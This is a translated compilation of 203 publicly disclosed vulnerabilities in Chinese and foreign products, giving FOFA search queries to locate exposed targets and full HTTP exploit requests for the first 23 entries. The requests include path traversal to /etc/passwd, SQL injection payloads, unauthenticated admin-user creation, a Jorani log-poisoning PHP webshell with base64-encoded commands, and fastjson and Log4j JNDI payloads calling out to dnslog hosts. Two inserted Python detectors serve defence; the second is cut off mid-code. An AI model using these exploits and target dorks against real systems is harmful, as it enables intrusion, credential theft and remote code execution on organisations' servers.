Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attack activity. This article is meant to help defenders; defensive teams can use it to check their own estate for exposure.

Sources: the article covers 203 PoCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are abbreviated with the placeholder PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's message channel to have it removed.

Notice
To keep things simple and easy to browse, there is no "reply to receive the full list" gate: this article is the complete list as it stands. When using it, just search the page for keywords (F12).
Bookmark this article if you find it useful, or follow the 网络安全新视界 public account.

Table of contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass (template injection)
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 全媒体 news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 hash of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin console with the default account admin, then send the request below.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login request below. The language parameter traverses into the application log directory, and the PHP written via the login field executes the base64-decoded value of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the request below to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

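Entries 2, 6, 13, 14, 15 and 20 all turn on how a path or a file parameter is interpreted: `../` climbing out of a static directory, a `;.ico` suffix or an `a.ico/../` segment that an access filter does not strip but the framework's path matcher does, and a query value that is really a local file name or a `file:` URL. The following is an added example, not code from the original article or from any of the products named: a Python access-log scanner that canonicalizes each request path the way a permissive framework would (matrix `;` suffixes dropped, dot segments resolved, percent-decoding applied twice) and flags traversal above the web root, alternative spellings of a protected endpoint, and file-reading parameter values. The log lines and the protected-endpoint list are constructed for illustration. The sensor feeding it must log the raw request line; a server that normalizes before logging hides exactly the spellings this looks for.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Assumed list of endpoints that must never be reachable anonymously.
PROTECTED_PREFIXES = ("/jshERP-boot/user/getAllList", "/admin/")

# Values that name a local file or a file: URL (entries 6, 7, 13, 20).
FILE_HINTS = ("file:", "/etc/passwd", "win.ini", "../", "/./", "/web-inf/")

# Constructed sample log (not from the article). The first four request lines
# mirror entries 2, 14, 15 and 20 above; the last one is benign traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Oct/2023:09:34:28 +0000] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1523
203.0.113.10 - - [24/Oct/2023:09:35:01 +0000] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8812
203.0.113.11 - - [24/Oct/2023:09:35:07 +0000] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8812
203.0.113.12 - - [24/Oct/2023:09:36:00 +0000] "GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1" 200 1523
198.51.100.5 - - [24/Oct/2023:09:36:30 +0000] "GET /static/css/app.css HTTP/1.1" 200 40211
"""


def _segments(raw_path: str) -> List[str]:
    # Decode twice so a double-encoded %252e%252e is seen as '..', and drop
    # ';matrix=params' from every segment the way Spring's path matcher does.
    return [seg.split(";", 1)[0] for seg in unquote(unquote(raw_path)).split("/")]


def canonical_path(raw_path: str) -> str:
    """Resolve '.', '..' and ';' suffixes so bypass spellings collapse onto the real target."""
    parts: List[str] = []
    for seg in _segments(raw_path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def escapes_root(raw_path: str) -> bool:
    """True when '..' segments climb above the web root, as in entry 2."""
    depth = 0
    for seg in _segments(raw_path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def file_read_params(query: str) -> List[str]:
    """Names of query parameters whose value looks like a local file or file: URL."""
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if any(h in unquote(v).lower() for h in FILE_HINTS)]


def analyse_target(target: str) -> Tuple[str, List[str]]:
    """Return (canonical path, findings) for one request target."""
    parts = urlsplit(target)
    canon = canonical_path(parts.path)
    findings = []
    if escapes_root(parts.path):
        findings.append("path-traversal")
    if any(canon.startswith(p) for p in PROTECTED_PREFIXES):
        # Same endpoint, different spelling: the ';.ico' and 'a.ico/../' tricks.
        findings.append("protected-endpoint-bypass" if canon != parts.path else "protected-endpoint")
    if file_read_params(parts.query):
        findings.append("file-read-parameter")
    return canon, findings


def scan(log_text: str) -> List[dict]:
    """Parse CLF lines and return one record per request with findings."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        canon, findings = analyse_target(target)
        if findings:
            hits.append({"client": client, "method": method, "raw": target,
                         "canonical": canon, "status": int(status), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["canonical"], ",".join(hit["findings"]))
```

Run as a script it prints the four suspicious requests; `scan()` returns them as dicts so the same logic can feed a SIEM rule. Hits on a protected endpoint with a 200 status deserve the first look, since jshERP answered exactly these spellings with its full user list.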
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls HASHBYTES to compute the MD5 of the string 1234 (81dc9bdb52d04dc20036dbd8313ed055); that digest in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
  <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
    <netMarkings>
      (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
    </netMarkings>
  </ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

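Entries 21 to 23 share one shape: an anonymous JSON body that names a class through `"@type"` (fastjson autotype) or carries a Log4j lookup (`${jndi:...}`), with the only visible effect being a DNS or LDAP callback to the attacker's host. The following is an added example, not the article's or Dahua's code: a Python body inspector that works on the raw text rather than on a parsed document, because the fastjson probe in entry 21 is deliberately not valid JSON and a parser-first filter would never see it. It extracts the `@type` class names, flags an assumed starter list of dangerous ones, detects plain and nested `${...}` lookups (the nested form is a known Log4Shell evasion that the entries above do not show), and pulls out callback hosts for blocking. The same callback-URL check applies to form-encoded bodies such as the `dsname=ldap://...` parameter of the registerServlet entry later in this list. The sample bodies are constructed copies of the page's payloads plus one benign request and one obfuscated lookup.

```python
import json
import re
from typing import Dict

# "@type" is how fastjson autotype chooses the class to instantiate.
TYPE_KEY = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w.$]*)"')
# Log4j 2 lookup syntax; the nested form covers ${${lower:j}ndi:...} style obfuscation.
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.I)
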